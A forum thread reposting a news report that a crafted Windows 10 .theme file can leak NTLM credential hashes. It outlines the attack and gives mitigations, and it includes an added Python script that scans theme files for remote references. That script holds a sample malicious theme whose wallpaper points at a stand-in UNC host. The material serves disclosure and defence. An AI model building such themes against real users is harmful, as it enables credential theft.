New finding says custom Windows 10 themes can be used to steal users' credentials


A new finding shared on Twitter by security researcher Jimmy Bayne points towards a loophole in Windows 10’s themes settings that can let bad actors steal users’ credentials by creating a specific theme to carry out a ‘Pass-the-Hash’ attack. The ability to install separate themes from other sources lets attackers create malicious theme files that, when opened, redirect users to a page that prompts them to enter their credentials.


Windows lets users share themes via the Settings UI by right-clicking on the currently active theme under Personalization > Themes and clicking on “Save theme for sharing”. This creates a ‘.deskthemepack’ file for sharing through email or other sources, which can then be downloaded and installed. Attackers can similarly create a ‘.theme’ file wherein the default wallpaper setting points to a website that requires authentication. When unsuspecting users enter their credentials, an NTLM hash of the details is sent to the site for authentication. Non-complex passwords are then cracked open using special de-hashing software.

One way the researcher provided for protecting against such files is to look for and block extensions such as ‘.theme’, ‘.themepack’, and ‘.desktopthemepackfile’. Additionally, BleepingComputer lists a few alternatives via group policy that restrict sending NTLM hashed credentials to remote hosts. However, the publication cautions that doing so could interfere with enterprise setups that require this feature for authentication.

Image credit: BleepingComputer

Bayne adds that these findings were disclosed to the Microsoft Security Response Center (MSRC). However, the bug was supposedly not fixed because it was a “feature by design”. It is not clear whether the company plans to fix the bug after this disclosure, or whether it will tweak the file structure of themes to prevent bad actors from leveraging it to point to sites that require authentication.


Considering that most users are logged into their Microsoft accounts in Windows 10, the theft of the credentials also puts users’ linked data – such as email, OneDrive, and even Azure data – at risk. It is best for users to always enable two-factor authentication as a primary form of account security.


Source: Jimmy Bayne (Twitter) via BleepingComputer



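The post above describes the telltale property of a malicious theme file: a wallpaper path that points at a remote host, so that applying the theme triggers an outbound authentication. The following audit script is an added illustration for this thread, not code from the researcher, BleepingComputer, or Microsoft. It assumes the documented plain-text .theme INI layout (a `[Control Panel\Desktop]` section with a `Wallpaper=` entry); the remote-path heuristic, the `find_remote_references`/`scan_theme_files` helpers and the two sample files are all constructed here. It generalizes slightly beyond the post by checking every key in every section, not only `Wallpaper`, so any remote reference in the file is reported.

```python
"""Audit plain-text Windows .theme files for values that point at a remote
host (UNC share or URL), the kind of entry a credential-stealing theme
carries.

Added example for this forum thread; not the researcher's, BleepingComputer's
or Microsoft's code. Assumed: the documented .theme INI layout
([Control Panel\\Desktop] with Wallpaper=...). Constructed here: the
heuristic, the helper names and the sample files. Packed .themepack /
.deskthemepack archives are not parsed; extract the contained .theme first.
"""
import configparser
import re
from pathlib import Path
from typing import Iterator, List, Tuple

# A value beginning with a UNC prefix (\\host\share\...) or a URL scheme would
# make the shell contact a remote host when the theme is applied.
REMOTE_VALUE = re.compile(r"^\s*(\\\\[^\\]+\\|https?://|ftp://)", re.IGNORECASE)

Finding = Tuple[str, str, str]  # (section, key, value)


def parse_theme(text: str) -> configparser.ConfigParser:
    """Parse .theme INI text. Interpolation is off because stock values such
    as %SystemRoot%\\web\\wallpaper\\... contain literal percent signs;
    strict=False tolerates duplicate keys some theme generators emit."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return cp


def find_remote_references(text: str) -> List[Finding]:
    """Return every (section, key, value) whose value looks like a remote
    path. All keys are checked, not only Wallpaper, so a remote reference
    placed under another key is reported as well."""
    cp = parse_theme(text)
    hits: List[Finding] = []
    for section in cp.sections():
        for key, value in cp.items(section):
            if REMOTE_VALUE.match(value):
                hits.append((section, key, value))
    return hits


def is_suspicious(text: str) -> bool:
    """True when the theme text contains at least one remote reference."""
    return bool(find_remote_references(text))


def scan_theme_files(root: Path) -> Iterator[Tuple[Path, List[Finding]]]:
    """Walk a directory (for example a mail-attachment quarantine) and yield
    each .theme file with its findings. A file that is not valid INI is
    reported with a sentinel finding instead of aborting the whole scan."""
    for path in sorted(root.rglob("*.theme")):
        text = path.read_text(encoding="utf-8-sig", errors="replace")
        try:
            findings = find_remote_references(text)
        except configparser.Error as err:
            findings = [("<unparseable>", "", str(err))]
        yield path, findings


# Constructed sample: what a stock-looking theme file contains.
BENIGN_THEME = r"""
[Theme]
DisplayName=Constructed benign theme

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
TileWallpaper=0
WallpaperStyle=10
"""

# Constructed sample: same layout, but the wallpaper is a UNC path on a
# documentation-range address (203.0.113.0/24), i.e. a remote host.
SUSPECT_THEME = r"""
[Theme]
DisplayName=Constructed suspicious theme

[Control Panel\Desktop]
Wallpaper=\\203.0.113.10\share\wallpaper.jpg
TileWallpaper=0
WallpaperStyle=10
"""


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_THEME), ("suspect", SUSPECT_THEME)):
        for section, key, value in find_remote_references(sample):
            print(f"{name}: [{section}] {key}={value}")
```

Pointing `scan_theme_files` at a quarantine folder turns this into a simple pre-delivery check; it complements, rather than replaces, the extension blocking and NTLM group-policy restrictions the post mentions, since a stock theme that references only local `%SystemRoot%` paths produces no findings while any UNC or URL value does.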

I guess there are still people out there who want their PC to "look pretty" rather than tweaking it to get the maximum speed. Themes have always been a drag on the system, which is why I have never used any, nor any fancy backgrounds. I coax the maximum speed I can get regardless of the hardware. So they are definitely targeting a specific class of user, ones we referred to as "Pretty Boys" in years past.


This is beyond stupid. How can you leave such a big hole in the wall for someone to use like that, hahaha, and not even sanitize the code of the theme?

Windows Defender nags me when I download some random .exe file, but does nothing for what's basically a .txt, hahah.


Windows 10's excessive updates caused patch makers to stop making patches for real custom themes like can be done in Windows 8.1 and below. The only themes Windows 10 has are the ones approved by M$, unless you use WindowBlinds, and using them is not even safe according to the OP, because people log in to Microsoft online, something I never did when I was using Windows.


On 9/7/2020 at 9:55 PM, straycat19 said:

Themes have always been a drag on the system


x64 browsers are a drag on people's systems too; do you not use them? Nowadays RAM is cheap and most people have plenty. What good is having it if you're not going to use it? A perfectionist does both: they tweak their system to look the best it can and tune it to run fast. (Good luck with fugly Windows 10 unless you buy stuff to fix it.)


BTW, it's just a Windows problem, because Windows 10 is full of unneeded bloat to start off with. Stuff that loads slow on Windows runs fast on Linux. Ricing Linux doesn't cause a performance hit and the sky is the limit, and you don't need to patch to go outside of the box, because it's not closed-source garbage.


Go tell these guys they're pretty boys and see how many downvotes you can get, and they will laugh at you if you tell them that you use Windows.



Themes on Windows 10 are a built-in feature controlled by M$, because patch devs gave up, since Windows 10 updates break their software. If you're having problems, it means that you need to buy better hardware or use Linux, where you can get away with using slower hardware. Linux Mint has a site where you can change themes, kind of like Microsoft does, called Cinnamon Spices, but it is also easy to add your own from other places. Cinnamon is one of the most customizable DEs. But MATE is not like that, because Linux Mint doesn't provide them for that DE, so you need to install 3rd-party themes to make it look decent. But it's nothing hard to do, really.


Most Linux distros have lots of different DEs with different themes. Most people on Linux don't run their DE the way it looked, unless it's some enterprise that uses Red Hat GNOME. Not being able to make an OS look the way you want is boring; even if their rice looks ugly, it's the way they wanted it.


Pretty sells, ugly does not; that's why women love Macs, they're nice and shiny. Giving up looks for speed, or speed for looks, means that there's something wrong with your OS or you use dated or low-end hardware.


That's why I use Ubuntu Budgie; it looks good out of the box. I set it up one time years ago the way I wanted mine to look and have never had to fool with it since.


Show us your Budgie Desktop - Ubuntu Budgie




Edited by steven36

2 hours ago, Sylence said:

Any response/comment from Microsoft? this is so far a one-sided story


From https://secureteam.co.uk/news/vulnerabilities/pass-the-hash-attack-discovered-in-windows-themes/ ...



According to the researcher, Microsoft stated that the software is behaving as designed and has no plans to make a change to thwart this attack vector.

